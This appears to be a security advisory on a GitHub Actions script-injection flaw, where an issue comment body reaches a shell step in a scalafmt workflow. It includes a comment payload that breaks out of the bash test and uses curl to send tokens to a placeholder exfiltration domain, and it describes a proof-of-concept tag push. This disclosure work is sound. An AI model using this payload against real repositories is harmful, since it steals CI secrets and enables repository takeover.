Using Issue_comment on .github/workflows/scalafmt-fix.yml an attacker can inject malicious code using github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate high privileged GITHUB_TOKEN which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret:
BROADBOT_GITHUB_TOKEN The Issue_comment in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly interpolates untrusted user input into a shell script.
- name: Check for ScalaFmt Comment
id: check-comment
run: |
if [[ "${{ github.event_name }}" == "issue_comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then
echo "::set-output name=comment-triggered::true"
else
echo "::set-output name=comment-triggered::false"
fi
In this case, it is possible to exfiltrate GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secrets.
To exploit the vulnerability an attacker can just drop a comment to any issue formed in the following way to exploit the vulnerability in the workflow .github/workflows/update_pylon_issue.yml.
test" == "test" ]]; then
& curl -s -d "$B64_BLOB" "https://$YOUR_EXFIL_DOMAIN/token" > /dev/null #
To prove this is possible, we created an issue and we added a comment with the malicious code to extract the GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secret. With the GITHUB_TOKEN extracted we were able to push a new poc tag which has been deleted after a couple of minutes.
Usually with GITHUB_TOKEN and write permissions, an attacker is able to completely overtake the repo.
GITHUB_TOKEN Permissions...
90Exploitability
AV:NAC:LPR:NUI:NScope
S:UImpact
C:HI:HA:NCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N